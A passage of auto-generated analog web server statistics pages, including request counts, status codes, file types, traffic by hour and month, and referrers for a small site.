<tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">0</td><td class="xl"> Windows CE</td></tr> <tr><td class="N">3</td><td class="R">227</td><td class="P">141</td><td class="xl">Unix</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">227</td><td class="P">141</td><td class="xl"> Linux</td></tr> <tr><td class="N">4</td><td class="R">164</td><td class="P">115</td><td class="xl">Macintosh</td></tr> <tr><td class="N">5</td><td class="R">1</td><td class="P">1</td><td class="xl">Symbian OS</td></tr> </tbody></table> </div><div class="code"><h2><a name="code" id="code">Status Code Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | Status Code Report | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./code.png" alt="" /></p> <p class="whatinc"> Listing status codes, sorted numerically.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">status code</th></tr></thead> <tbody><tr><td class="R">1335</td><td class="xl">200 OK</td></tr> <tr><td class="R">1</td><td class="xl">301 Document moved permanently</td></tr> <tr><td class="R">5</td><td class="xl">302 Document found elsewhere</td></tr> <tr><td class="R">164</td><td class="xl">403 Access forbidden</td></tr> <tr><td class="R">2196</td><td class="xl">404 Document not found</td></tr> </tbody></table> </div><div class="size"><h2><a name="size" id="size">File Size Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | File Size Report | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./size.png" alt="" /></p> <table> <thead><tr><th class="x">size</th><th class="R">#reqs</th><th class="b">%bytes</th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">22</td><td class="b"> </td></tr> <tr><td class="x"> 1B- 10B</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 11B- 100B</td><td class="R">62</td><td class="b"> 0.33%</td></tr> <tr><td class="x"> 101B- 1kB</td><td class="R">783</td><td class="b">28.27%</td></tr> <tr><td class="x"> 1kB- 10kB</td><td class="R">467</td><td class="b">54.39%</td></tr> <tr><td class="x"> 10kB-100kB</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x">100kB- 1MB</td><td class="R">1</td><td class="b">17.01%</td></tr> </tbody></table> </div><div class="type"><h2><a name="type" id="type">File Type Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | File Type Report | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./type.png" alt="" /></p> <p class="whatinc"> Listing extensions with at least 0.1% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">extension</th></tr></thead> <tbody><tr><td class="R">933</td><td class="b">47.48%</td><td class="xl">[directories]</td></tr> <tr><td class="R">243</td><td class="b">25.75%</td><td class="xl">.js [JavaScript code]</td></tr> <tr><td class="R">8</td><td class="b">20.94%</td><td class="xl">.php [PHP]</td></tr> <tr><td class="R">47</td><td class="b"> 3.94%</td><td class="xl">.css [Cascading Style Sheets]</td></tr> <tr><td class="R">41</td><td class="b"> 1.05%</td><td class="xl">.svg</td></tr> <tr><td class="R">1</td><td class="b"> 0.51%</td><td class="xl">.cgi [CGI scripts]</td></tr> <tr><td class="R">62</td><td class="b"> 0.33%</td><td class="xl">[no extension]</td></tr> </tbody></table> </div><div class="dir"><h2><a name="dir" id="dir">Directory Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | Directory Report | <a href="#req">Request Report</a>)</p> <p><img src="./dir.png" alt="" /></p> <p class="whatinc"> Listing directories with at least 0.01% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">directory</th></tr></thead> <tbody><tr><td class="R">913</td><td class="b">67.24%</td><td class="xl">[root directory]</td></tr> <tr><td class="R">331</td><td class="b">30.75%</td><td class="xl">/_autoindex/</td></tr> <tr><td class="R">90</td><td class="b"> 1.51%</td><td class="xl">/.well-known/</td></tr> <tr><td class="R">1</td><td class="b"> 0.51%</td><td class="xl">/cgi-sys/</td></tr> </tbody></table> </div><div class="req"><h2><a name="req" id="req">Request Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | Request Report)</p> <p><img src="./req.png" alt="" /></p> <p class="whatinc"> Listing files with at least 20 requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="D">last time</th><th class="xl">file</th></tr></thead> <tbody><tr><td class="R">905</td><td class="b">46.30%</td><td class="D">Sep/29/25 6:41 PM</td><td class="xl"><a href="/">/</a></td></tr> <tr class="sub level2"><td class="R">83</td><td class="b"> 3.75%</td><td class="D">Sep/ 5/25 12:14 PM</td><td class="xl"> <a href="/?192.42.116.194">/?192.42.116.194</a></td></tr> <tr class="sub level2"><td class="R">28</td><td class="b"> 2.04%</td><td class="D">Jun/27/24 12:00 AM</td><td class="xl"> <a href="/?195.211.77.140">/?195.211.77.140</a></td></tr> <tr class="sub level2"><td class="R">25</td><td class="b"> 1.62%</td><td class="D">Sep/15/24 3:19 PM</td><td class="xl"> <a href="/?198.235.24.138">/?198.235.24.138</a></td></tr> <tr class="sub level2"><td class="R">25</td><td class="b"> 1.06%</td><td class="D">Mar/ 1/25 3:30 PM</td><td class="xl"> <a href="/?104.166.80.124">/?104.166.80.124</a></td></tr> <tr class="sub level2"><td class="R">23</td><td class="b"> 1.25%</td><td class="D">Feb/28/25 11:54 PM</td><td class="xl"> <a href="/?45.148.10.172">/?45.148.10.172</a></td></tr> <tr class="sub level2"><td class="R">12</td><td class="b"> 0.68%</td><td class="D">Sep/29/25 12:17 PM</td><td class="xl"> <a href="/?147.93.158.41">/?147.93.158.41</a></td></tr> <tr class="sub level2"><td class="R">12</td><td class="b"> 0.47%</td><td class="D">Sep/16/25 1:04 AM</td><td class="xl"> <a href="/?rest_route=/wp/v2/users/">/?rest_route=/wp/v2/users/</a></td></tr> <tr class="sub level2"><td class="R">12</td><td class="b"> 0.75%</td><td class="D">Jul/26/24 5:12 AM</td><td class="xl"> <a href="/?199.45.154.72">/?199.45.154.72</a></td></tr> <tr><td class="R">128</td><td class="b">23.01%</td><td class="D">Sep/28/25 8:21 PM</td><td class="xl">/_autoindex/assets/js/tablesort.js</td></tr> <tr><td class="R">115</td><td class="b"> 2.74%</td><td class="D">Sep/28/25 8:17 PM</td><td class="xl">/_autoindex/assets/js/tablesort.number.js</td></tr> <tr><td class="R">47</td><td class="b"> 3.94%</td><td class="D">Sep/28/25 8:35 AM</td><td class="xl">/_autoindex/assets/css/autoindex.css</td></tr> <tr><td class="R">37</td><td class="b"> 0.95%</td><td class="D">Sep/16/25 6:20 AM</td><td class="xl">/_autoindex/assets/icons/folder-fill.svg</td></tr> <tr><td class="R">103</td><td class="b">23.05%</td><td class="D">Sep/16/25 1:03 AM</td><td class="xl">[not listed: 33 files]</td></tr> </tbody></table> </div><div class="footer"><p class="credit">This analysis was produced by <a href="http://www.analog.cx/">analog 6.0</a>. <br /><span class="runtimetitle">Running time:</span> Less than 1 second. </p> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> </div> </body> </html> 3.html 0000644 00000141757 15114762025 0005616 0 ustar 00 <?xml version="1.0" encoding="ISO-8859-1"?> <?xml-stylesheet href="#internalStyle" type="text/css"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Web Server Statistics for ia.imators.com</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <meta name="robots" content="noindex,nofollow" /> <meta name="generator" content="analog 6.0/Unix" /> <style type="text/css" id="internalStyle"> h2 { background-color: #A0C0F0; width: 98%; padding: 3px 6px; } table { text-align: right; margin-left: 30px; background-color: #D0E0F0; border-collapse: collapse; } th { border-bottom: 1px solid #404050; border-right: 1px dotted #606070; border-top: none; border-left: none; padding: 0px 5px 1px 5px; font-weight: bold; background-color: #A0C0F0; } td { padding: 0px 5px 1px 5px; border-right: 1px dotted #606070; border-left: none; border-bottom: none; border-top:none; } td.x { font-family: monospace; white-space: pre; } .xl { text-align: left; border-right: none; } .xr { text-align: right; border-right: none; } .bar { text-align: left; border-right: none; } tr.sub {background-color: #C0C0FF; font-style: italic; } .repdesc { font-style: italic; } .repspan { font-style: italic; } .goto { font-size: small; } .gensumtitle { font-weight: bold; } .gototitle { font-weight: bold; } .runtimetitle { font-weight: bold; } img { border-style: none; } a:link { color: blue; text-decoration: none; } a:visited { color: purple; text-decoration: none; } a:link:hover { text-decoration: underline; } a:visited:hover { text-decoration: underline; } a:link:active { color: red; text-decoration: underline; } a:visited:active { color: red; text-decoration: underline; } </style> </head> <body> <div class="header"><h1><a name="Top" id="Top" href="http://www.analog.cx/"><img src="/images/analogo.png" alt="" /></a> Web Server Statistics for <a href="http://ia.imators.com/">ia.imators.com</a></h1> <p class="analysisspan">Program started on Mon, Mar 31 2025 at 2:11 PM. <br />Analyzed requests from Wed, May 15 2024 at 10:34 PM to Mon, Mar 31 2025 at 8:25 AM (319.41 days).</p> </div> <div class="gensum"><h2><a name="gensum" id="gensum">General Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | General Summary | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="lastseven">Figures in parentheses refer to the 7-day period ending Mar 31 2025 at 2:11 PM.</p> <p class="gensumlines"> <span class="gensumtitle">Successful requests:</span> 823 (6) <br /><span class="gensumtitle">Average successful requests per day:</span> 2 (0) <br /><span class="gensumtitle">Successful requests for pages:</span> 567 (6) <br /><span class="gensumtitle">Average successful requests for pages per day:</span> 1 (0) <br /><span class="gensumtitle">Failed requests:</span> 701 (1) <br /><span class="gensumtitle">Redirected requests:</span> 2 (0) <br /><span class="gensumtitle">Distinct files requested:</span> 40 (202) <br /><span class="gensumtitle">Distinct hosts served:</span> 429 (501) <br /><span class="gensumtitle">Data transferred:</span> 746.70 kilobytes (4.53 kilobytes) <br /><span class="gensumtitle">Average data transferred per day:</span> 2.34 kilobytes (663 bytes) </p> </div><div class="month"><h2><a name="month" id="month">Monthly Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | Monthly Report | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 3 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">month</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">May 2024</td><td class="R">162</td><td class="P">101</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Jun 2024</td><td class="R">69</td><td class="P">63</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Jul 2024</td><td class="R">141</td><td class="P">97</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Aug 2024</td><td class="R">45</td><td class="P">41</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Sep 2024</td><td class="R">148</td><td class="P">82</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Oct 2024</td><td class="R">24</td><td class="P">20</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Nov 2024</td><td class="R">59</td><td class="P">31</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Dec 2024</td><td class="R">26</td><td class="P">18</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> </td><td class="R"> </td><td class="P"> </td><td class="bar"> </td></tr> <tr><td class="x">Jan 2025</td><td class="R">63</td><td class="P">43</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Feb 2025</td><td class="R">21</td><td class="P">18</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Mar 2025</td><td class="R">65</td><td class="P">53</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> </tbody></table> <p class="busiesttime">Busiest month: May 2024 (101 requests for pages).</p> </div><div class="daysum"><h2><a name="daysum" id="daysum">Daily Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | Daily Summary | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 3 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">day</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Sun</td><td class="R">120</td><td class="P">95</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++" /></td></tr> <tr><td class="x">Mon</td><td class="R">104</td><td class="P">71</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /></td></tr> <tr><td class="x">Tue</td><td class="R">106</td><td class="P">82</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Wed</td><td class="R">102</td><td class="P">65</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Thu</td><td class="R">150</td><td class="P">81</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Fri</td><td class="R">115</td><td class="P">95</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++" /></td></tr> <tr><td class="x">Sat</td><td class="R">126</td><td class="P">78</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> </tbody></table> </div><div class="hoursum"><h2><a name="hoursum" id="hoursum">Hourly Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | Hourly Summary | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 3 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">hour</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">23</td><td class="P">21</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 1</td><td class="R">29</td><td class="P">25</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 2</td><td class="R">39</td><td class="P">19</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 3</td><td class="R">17</td><td class="P">15</td><td class="bar"><img src="/images/barb4.png" alt="+++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 4</td><td class="R">26</td><td class="P">20</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 5</td><td class="R">30</td><td class="P">19</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 6</td><td class="R">34</td><td class="P">27</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 7</td><td class="R">28</td><td class="P">24</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x"> 8</td><td class="R">51</td><td class="P">39</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 9</td><td class="R">33</td><td class="P">27</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">10</td><td class="R">33</td><td class="P">32</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">11</td><td class="R">18</td><td class="P">18</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">12</td><td class="R">29</td><td class="P">23</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x">13</td><td class="R">33</td><td class="P">31</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">14</td><td class="R">18</td><td class="P">18</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">15</td><td class="R">19</td><td class="P">12</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">16</td><td class="R">26</td><td class="P">14</td><td class="bar"><img src="/images/barb4.png" alt="+++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">17</td><td class="R">8</td><td class="P">8</td><td class="bar"><img src="/images/barb2.png" alt="+++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">18</td><td class="R">26</td><td class="P">20</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">19</td><td class="R">24</td><td class="P">17</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">20</td><td class="R">11</td><td class="P">11</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">21</td><td class="R">16</td><td class="P">12</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">22</td><td class="R">213</td><td class="P">92</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">23</td><td class="R">39</td><td class="P">23</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> </tbody></table> </div><div class="dom"><h2><a name="dom" id="dom">Domain Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | Domain Report | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="whatinc"> Listing domains, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">domain</th></tr></thead> <tbody><tr><td class="R">823</td><td class="b">100%</td><td class="xl">[unresolved numerical addresses]</td></tr> </tbody></table> </div><div class="org"><h2><a name="org" id="org">Organization Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | Organization Report | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./org.png" alt="" /></p> <p class="whatinc"> Listing the top 20 organizations by the number of requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">organization</th></tr></thead> <tbody><tr><td class="R">59</td><td class="b"> 8.06%</td><td class="xl">205.169</td></tr> <tr><td class="R">49</td><td class="b"> 5.09%</td><td class="xl">104</td></tr> <tr><td class="R">43</td><td class="b"> 5.42%</td><td class="xl">34</td></tr> <tr><td class="R">42</td><td class="b"> 5.48%</td><td class="xl">35</td></tr> <tr><td class="R">42</td><td class="b"> 6.80%</td><td class="xl">198.235</td></tr> <tr><td class="R">39</td><td class="b"> 7.10%</td><td class="xl">205.210</td></tr> <tr><td class="R">35</td><td class="b"> 3.68%</td><td class="xl">47</td></tr> <tr><td class="R">25</td><td class="b"> 3.73%</td><td class="xl">45</td></tr> <tr><td class="R">24</td><td class="b"> 3.38%</td><td class="xl">3</td></tr> <tr><td class="R">21</td><td class="b"> 9.73%</td><td class="xl">106</td></tr> <tr><td class="R">17</td><td class="b"> 2.09%</td><td class="xl">54</td></tr> <tr><td class="R">14</td><td class="b"> 1.04%</td><td class="xl">167.94</td></tr> <tr><td class="R">14</td><td class="b"> 0.56%</td><td class="xl">195.211</td></tr> <tr><td class="R">13</td><td class="b"> 1.00%</td><td class="xl">207.241</td></tr> <tr><td class="R">12</td><td class="b"> 1.23%</td><td class="xl">51</td></tr> <tr><td class="R">12</td><td class="b"> 0.10%</td><td class="xl">194.87</td></tr> <tr><td class="R">12</td><td class="b"> 0.93%</td><td class="xl">87</td></tr> <tr><td class="R">12</td><td class="b"> 0.93%</td><td class="xl">64.227</td></tr> <tr><td class="R">11</td><td class="b"> 1.38%</td><td class="xl">65.154</td></tr> <tr><td class="R">10</td><td class="b"> 1.20%</td><td class="xl">168.151</td></tr> <tr><td class="R">317</td><td class="b">31.05%</td><td class="xl">[not listed: 93 organizations]</td></tr> </tbody></table> </div><div class="failref"><h2><a name="failref" id="failref">Failed Referrer Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | Failed Referrer Report | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./failref.png" alt="" /></p> <p class="whatinc"> Listing referring URLs, sorted by the number of failed requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead> <tbody><tr><td class="R">47</td><td class="xl"><a href="http://www.ia.imators.com/">http://www.ia.imators.com/</a></td></tr> <tr><td class="R">20</td><td class="xl"><a href="https://www.ia.imators.com/">https://www.ia.imators.com/</a></td></tr> <tr><td class="R">19</td><td class="xl"><a href="http://ia.imators.com/">http://ia.imators.com/</a></td></tr> <tr><td class="R">7</td><td class="xl"><a 